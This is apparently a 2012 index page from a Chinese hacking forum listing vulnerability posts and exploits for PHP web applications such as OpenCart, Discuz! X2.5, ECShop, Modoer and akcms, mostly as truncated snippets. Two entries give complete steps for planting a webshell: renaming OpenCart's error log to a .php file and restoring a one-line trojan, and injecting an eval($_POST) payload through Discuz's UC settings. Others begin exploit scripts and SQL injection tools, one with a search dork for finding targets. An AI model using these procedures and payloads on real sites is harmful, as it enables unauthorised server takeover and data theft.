OpenCart 后台getshell

(脚本区不能发帖?)1,进入后台,点击system-Setting,在server选项下error.txt,改成1.php2,点击system-Backup / Restore选择一个纯一句话木马的sql文件,导入,选择Restore(还原)。会提示出错的,无法还原的。3,访问网址site/system/logs/1.php 就是一句话shell了。

2012-10-27 22:11 10 6851

最新xdcms_v2.0.2 0DAY

开始吧在留言的地方lists.php文件<?phpclass lists extends db{public function init(){$input=base::load_class('input');$formid=isset($_GET)?intval($_GET):0;$form_arr=base::load_cache("cache_form","_form");$form=get_array($form_arr,'id',$formid,0);$field=base::load_cache("cache_form_"

2012-10-26 18:30 13 3512

Anwsion(v1.1-Beta4) 注入

\app\home\main.php(85): public function explore_action() { // 省略........... By.Rices -> Forum: T00ls.Net -> Blog: Rices.so if ($_GET) { if (is_numeric($_GET)) //据说以前这里也可以注射 所以被isnum

2012-10-26 13:49 15 3827

phpstat 读文件

./count/count.com.php$website = $_GET;$image = $_GET;//确定图片if(!$image)$imagesrc = "../templates/".TPL_NAME."/".TPL_IMGDIR."/icos/countlogo1.gif";else$imagesrc = "../templates/".TPL_NAME."/".TPL_IMGDIR."/icos/".$image;//发送图片 header("Content-type: image/gif");readfile($i

2012-10-19 21:39 13 3616

ECShop <= v2.7.3 SQL injection / exploit

{:6_449:} 好像是最新的<?phpprint_r('+---------------------------------------------------------------------------+ECShop <= v2.7.3 SQL injection / exploitby 帅的一塌糊涂mail: hiqiushuiabc gmail dot comteam: http://hi.baidu.com/w5r2dork: "Powered by ECShop"+-----------------------

2012-10-10 00:21 20 7092

Discuz! X2.5管理后台uc配置 get webshell漏洞

首先,进入后台以管理员身份登录; 然后,打开站长→UC设置 看截图:在UC设置ip地址里面填写 经过处理的一句话如下 Madman\’);eval($_POST)?>;// QQ 然后保存即可。 连接地址:http://bbs.xxxxx.com/config/config_ucenter.php

2012-10-9 22:01 11 4154

补发20120407 Discuz! X2.5 远程代码执行漏洞及EXP[XDAY]

最近大家开始关注discuz了,由于之前t00ls关站好久,错过一些dz的漏洞,转载下。if(!defined('IN_DISCUZ')) {@@ -89,7 +89,7 @@}}if($searcharray && $replacearray) {- $content = preg_replace("/(.*?)|()|(\(\d+)\)/ies", 'helper_seo::base64_transform("encode", "", "\\1\\2\\3", "")', $content

2012-10-9 21:57 23 5242

Modoer EXP

声明:本漏洞是t00ls -- 大牛挖的!本菜自己需要用就写了一个!!<html><head><title> Modoer EXP </title><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /></head><script language="javascript"> function expstart() { var url = document.forms.url.value; if(url !

2012-9-24 03:11 13 4062

Modoer 点评系统注射 几个版本通杀

不给力的注射, 搞某站挖的, 查了下没什么大站用这个 影响不大 发出来大家交流学习, 废话不多说, 看我们的猪肉点~~~~~{:6_409:}首先\core\modules\item\ajax.php开始调用~$do = trim($_GET);$op = trim($_GET);// 允许的操作行为$allowacs = array( 'respond', 'review', 'subject', 'picture', 'guestb

2012-9-23 02:08 20 5844

akcms代码执行漏洞

上周挖出的akcms的后台模版getshell感觉没什么新意,然后又仔细看了看代码,发现了一个比较有“前途”的洞,代码执行漏洞,而且出问题函数是作者提供给建站用户进行二次开发时使用的,也就是说这个问题放大的程度也会要大些。 0x01原理分析 漏洞问题主要存在于include\common.func.php文

2012-9-21 16:41 10 3836